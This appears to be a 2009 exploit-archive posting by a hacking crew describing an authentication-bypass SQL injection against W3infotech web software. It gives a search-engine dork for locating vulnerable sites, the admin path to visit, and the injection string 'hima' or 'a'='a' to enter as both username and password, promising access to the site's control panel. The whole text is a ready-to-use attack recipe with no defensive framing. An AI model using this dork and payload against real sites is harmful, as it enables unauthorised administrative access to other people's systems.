[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : W3infotech ( Auth Bypass ) SQL Injection Vulnerability
# Published : 2009-11-24
# Author : ViRuS_HiMa
# Previous Title : PointComma <= 3.8b2 Remote File Inclusion Vulnerability
# Next Title : Quick.Cart 3.4 and Quick.CMS 2.4 CSRF Vulnerabilities
[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__ #
[+] |______________________|___||*___ #
[+] |______________________|___||""|"*___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]====================================================================||
[*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability ||
[!] Site : http://www.w3infotech.com ||
[!] Author : ViRuS_HiMa ||
[!] Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Cairo-007 ||
[!]====================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
[!]====================================================================||
[!]
[!] Exploitation : ||
[!]
[!] you can use this dork : "Powered By W3infotech" ||
[!]
[!] Just add the admin path ,, so it will be : ||
[!]
[!] http://server/admin ||
[!]
[!] then auth bypass using this password : ||
[!]
[!] hima' or 'a'='a ||
[!]
[!] it mean that you have to type the same code in user and pass ||
[!]
[!] what you got ?? ,, you are in the script control panel now :p ||
[!]
[!]====================================================================||
[!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . ||
[*]====================================================================||